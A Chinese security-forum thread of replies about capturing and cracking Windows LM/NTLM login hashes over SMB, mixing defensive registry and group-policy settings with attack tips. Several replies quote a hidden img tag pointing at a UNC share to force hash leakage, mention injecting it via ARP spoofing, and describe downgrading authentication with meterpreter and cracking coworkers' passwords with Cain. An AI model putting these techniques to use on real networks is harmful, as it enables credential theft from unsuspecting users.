能力值:
( LV2,RANK:10 )
|
-
-
2 楼
我和我的小伙伴们都惊呆了。顶tao哥
|
能力值:
( LV8,RANK:120 )
|
-
-
3 楼
不错,在内网搞同事是很危险的,不过可惜看到最后说WIN7默认禁止了
|
能力值:
( LV3,RANK:20 )
|
-
-
4 楼
我伴呆 那个反射攻击也是这个原理?
|
能力值:
( LV12,RANK:750 )
|
-
-
5 楼
这个就是前段时间yuange他们微博上讨论的玩意吧,哈哈!windows7没影响?是windows7发送了hash,但是没法破解???还是怎么着?
|
能力值:
(RANK:290 )
|
-
-
6 楼
kan 不懂 昂视要mark
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
感谢分享 mark SMB抓包破解windows登陆密码
|
能力值:
( LV4,RANK:50 )
|
-
-
8 楼
谢谢,有机会试验一把。
|
能力值:
( LV8,RANK:120 )
|
-
-
9 楼
win7以上的东东~·
的确给禁止了·~悲剧~!公司大部分都是W7
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
ARP欺骗也可以插入<img src="\\10.1.1.3\Incoming" hidden="true">这个代码~!
|
能力值:
( LV9,RANK:270 )
|
-
-
10 楼
Using Group Policy
Network security: LAN Manager authentication level
Default:
Windows 2000 and Windows XP: send LM & NTLM responses
Windows Server 2003: Send NTLM response only
Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2: Send NTLMv2 response only
Editing the Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa ValueName: LmCompatibilityLevel RegKey data type: REG_DWORD
0 - Send LM & NTLM responses 1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated 2 - Send NTLM response only 3 - Send NTLMv2 response only 4 - Send NTLMv2 response only. refuse LM 5 - Send NTLMv2 response only. refuse LM & NTLM
Using Group Policy
Network security: Do not store LAN Manager hash value on next password change
Default on Windows Vista and above: Enabled Default on Windows XP: Disabled.
Editing the Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa ValueName: NoLMHash RegKey data type: REG_DWORD 0 - Disabled 1 - Enabled
|
能力值:
( LV15,RANK:280 )
|
-
-
11 楼
准确的说是:Win7禁用了那种不安全的认证协议,然而还是可以通过编辑‘组策略Group Policy’,或者修改注册表来让他支持。
如果你的meterpreter后面目标机器上运行了,就可以改策略,得hash。
|
能力值:
( LV3,RANK:30 )
|
-
-
12 楼
我以前在公司局域网的时候是用cain+arp欺骗来破解Windows密码,只要密码是数字字母,不是太长的话,几分钟就搞到密码了。
|
能力值:
( LV3,RANK:20 )
|
-
-
13 楼
很吊啊。。。
|
能力值:
( LV8,RANK:120 )
|
-
-
14 楼
那就要你有程序能运行了,意义貌似不是大了,特别是改组策略的话,起码要管理员权限
|
能力值:
( LV2,RANK:10 )
|
-
-
15 楼
来了解一下情况,
|
能力值:
( LV2,RANK:10 )
|
-
-
16 楼
谢谢楼主分享啊
|
能力值:
( LV2,RANK:10 )
|
-
-
17 楼
原理有点深奥。。。慢慢消化一下
|
能力值:
( LV2,RANK:10 )
|
-
-
18 楼
了解一下,有空试试。
|
能力值:
( LV2,RANK:10 )
|
-
-
19 楼
能适合xp也不错
|
能力值:
( LV2,RANK:10 )
|
-
-
20 楼
网吧那样的环境,怎么搞到收款机器的呢?
|
能力值:
( LV4,RANK:50 )
|
-
-
21 楼
<img src="\\10.1.1.3\Incoming" hidden="true">
这个思路真心不错~! 又学到一招了 !
|
能力值:
( LV2,RANK:10 )
|
-
-
22 楼
这个应该不是,google "halflmchall"就可以看到是若干年之前的技术方法了。
|
能力值:
( LV2,RANK:10 )
|
-
-
23 楼
思路不错啊,类似的我见过CS技术,那个可以用阻止第三方COOKIE来防止,LZ这个就没办法了..
|
能力值:
( LV2,RANK:10 )
|
-
-
24 楼
楼主的意思是把<img src="\\10.1.1.3\Incoming" hidden="true">这句话写在一个网页上面就可以实现了吗?
|
能力值:
( LV2,RANK:10 )
|
-
-
25 楼
好好学习学习
|
|
|